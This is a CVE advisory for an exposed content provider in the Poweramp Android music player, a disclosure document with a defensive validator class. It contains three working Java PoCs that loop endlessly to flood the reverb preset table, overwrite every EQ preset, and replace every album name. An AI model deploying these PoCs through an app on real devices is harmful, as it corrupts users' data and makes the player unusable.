Escalation of Privileges exists in POWERAMP (CVE-2023-27645)

Vendor: POWERAMP (https://powerampapp.com/)

Affected product: Poweramp (com.maxmpz.audioplayer)

Version: build-954-uni

Download link: https://play.google.com/store/apps/details?id=com.maxmpz.audioplayer

Description of the vulnerability for use in the CVE: An issue found in POWERAMP audio player build 925 bundle play and build 954 allows a remote attacker to gain privileges via the reverb and EQ preset parameters.

Additional information: Poweramp is a popular music player for Android. During its initialization phase, the application reads data saved in its database. Some of this data is used for UI display (for example album names), while other data drives application function settings (for example reverb and EQ presets). The database is reachable from other applications through the content URIs under content://com.maxmpz.audioplayer.data/, as the PoCs below show. If a malicious application modifies this key data in the database, it can cause UI hijacking (such as arbitrary modification of album names) and function manipulation (such as arbitrary setting of reverb effects).

1. After a large amount of data is inserted into the database, the reverb preset selection disappears, the main page UI stops working and gives no touch feedback, and the attacker can insert arbitrary reverb presets. In addition, the attacker can modify the values of the original default reverb presets, or even set all of them to zero so that the reverb effect is effectively turned off.

PoC:

    // Runs from a third-party app: the provider URI is reachable without any permission.
    public void attack() {
        ContentResolver contentResolver = this.getApplicationContext().getContentResolver();
        Uri uri = Uri.parse("content://com.maxmpz.audioplayer.data/reverb_presets");
        // Insert rows without limit to flood the reverb_presets table.
        while (true) {
            ContentValues contentValues = new ContentValues();
            contentValues.put("name", "hack");
            // Preset payload with every reverb parameter set to zero.
            contentValues.put("_data", "1=0.0;2=0.0;3=0.0;4=0.0;5=0.0;6=0.0;7=0.0;8=0.0;");
            contentResolver.insert(uri, contentValues);
        }
    }


2. By inserting data into the database or modifying existing rows, the attacker can arbitrarily set the initial values of the various audio effects or add arbitrary custom audio effects.

PoC:

    // Runs from a third-party app: the provider URI is reachable without any permission.
    public void attack() {
        ContentResolver contentResolver = this.getApplicationContext().getContentResolver();
        Uri uri = Uri.parse("content://com.maxmpz.audioplayer.data/eq_presets");
        while (true) {
            ContentValues contentValues = new ContentValues();
            // Flat EQ payload: every band and the preamp set to zero.
            contentValues.put("_data", "31=0.0;62=0.0;125=0.0;250=0.0;500=0.0;1K=0.0;2K=0;4K=0;8K=0;16K=0;preamp=0");
            // No selection, so every row of eq_presets is overwritten.
            contentResolver.update(uri, contentValues, null, null);
        }
    }

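As an added defender-side example (not part of the original report and not Poweramp's own code), the following is the kind of row validation the application's content provider could apply in its `insert`/`update` paths before a preset reaches the database, in addition to not exporting the provider to other apps (or guarding it with a signature-level permission). It mirrors the `key=value;` layout of the `_data` strings in PoCs 1 and 2; the band key sets, the length caps and the gain range are assumptions for this example.

```java
import java.util.Arrays;
import java.util.HashSet;
import java.util.Locale;
import java.util.Set;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

// Constructed validator for preset rows before they are written to the database.
// The "key=value;" layout follows the PoC strings above; the key sets, length caps
// and gain range are ASSUMPTIONS for this example, not Poweramp's actual rules.
public final class PresetValidator {
    static final int MAX_NAME_LEN = 64;     // assumed: presets carry short display names
    static final int MAX_DATA_LEN = 256;    // assumed: far below the 5 KiB the PoC writes
    static final float MIN_GAIN = -15.0f, MAX_GAIN = 15.0f;   // assumed dB bounds

    public static final Set<String> REVERB_KEYS = new HashSet<>(Arrays.asList(
            "1", "2", "3", "4", "5", "6", "7", "8"));
    public static final Set<String> EQ_KEYS = new HashSet<>(Arrays.asList(
            "31", "62", "125", "250", "500", "1K", "2K", "4K", "8K", "16K", "PREAMP"));

    private static final Pattern FIELD = Pattern.compile("([A-Za-z0-9]+)=(-?\\d+(?:\\.\\d+)?)");

    /** Returns null if the row is acceptable, otherwise the reason it must be rejected. */
    public static String check(String name, String data, Set<String> allowedKeys) {
        if (name == null || name.isEmpty() || name.length() > MAX_NAME_LEN) return "bad name length";
        if (data == null || data.length() > MAX_DATA_LEN) return "bad _data length";
        Set<String> seen = new HashSet<>();
        for (String field : data.split(";")) {
            if (field.isEmpty()) continue;                       // tolerate a trailing ';'
            Matcher m = FIELD.matcher(field);
            if (!m.matches()) return "malformed field: " + field;
            String key = m.group(1).toUpperCase(Locale.ROOT);
            if (!allowedKeys.contains(key)) return "unknown band: " + key;
            if (!seen.add(key)) return "duplicate band: " + key;
            float v = Float.parseFloat(m.group(2));
            if (v < MIN_GAIN || v > MAX_GAIN) return "gain out of range: " + field;
        }
        if (!seen.equals(allowedKeys)) return "incomplete preset: missing bands";
        return null;
    }

    public static void main(String[] args) {
        // A well-formed reverb row passes; a truncated row and an oversized row are rejected.
        System.out.println(check("Hall", "1=0.0;2=0.5;3=1.0;4=0.0;5=0.0;6=0.0;7=0.0;8=0.0;", REVERB_KEYS));
        System.out.println(check("hack", "1=0.0;2=0.0;3=0.0;4=0.0;", REVERB_KEYS));
        String huge = new String(new char[5120]).replace('\0', 'A');   // stands in for getRandomString(5120)
        System.out.println(check("hack", huge, EQ_KEYS));
    }
}
```

Even with validation in place, a row count limit per table is still needed, since PoC 1 floods the table with rows that are individually well-formed.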

3. Modifying the album name in the database tampers with the UI content of the Albums page and also affects the album shown while a song is playing.

PoC:

    // Runs from a third-party app: the provider URI is reachable without any permission.
    public void attack() {
        ContentResolver contentResolver = this.getApplicationContext().getContentResolver();
        Uri uri = Uri.parse("content://com.maxmpz.audioplayer.data/albums");
        while (true) {
            ContentValues contentValues = new ContentValues();
            // getRandomString(n) is a helper not shown on this page; it returns a random string of length n.
            String randomString = getRandomString(5120);
            contentValues.put("album", randomString);
            // No selection, so the album name of every row is overwritten.
            contentResolver.update(uri, contentValues, null, null);
        }
    }
